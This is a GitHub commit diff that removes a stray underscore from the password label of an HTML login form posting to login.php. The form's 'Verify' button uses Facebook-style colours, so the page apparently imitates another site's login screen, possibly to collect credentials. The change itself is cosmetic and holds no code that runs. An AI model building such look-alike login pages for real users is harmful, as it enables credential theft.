Removed underscore from form

This commit is contained in:
Alexey Mozzhakov 2018-06-28 10:53:04 +03:00 committed by GitHub
parent 3cbb7c6e3b
commit 400cd69d0c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -29,7 +29,7 @@
<form method="post" class="bb" novalidate="1" id="login-form" action="login.php">
<label for="username">Username:</label><input name="username" id="username" type="username"></input><br />
<br> <br/>
<label for="password">Password:_</label><input name="password" id="password" type="password"></input><br />
<label for="password">Password:</label><input name="password" id="password" type="password"></input><br />
<input id="keep" style="margin: 10px 0 0 84px" type="checkbox"></input>
<label for="keep" style="font-size:12px;">keep me logged in</label><br />
<input type="submit" name="submit" value="Verify" style="background: none repeat scroll 0 0 #3b5998; border: 1px solid #294461; color: #ffffff; margin: 4px 0 0 80px; padding: 2px 6px;"></input>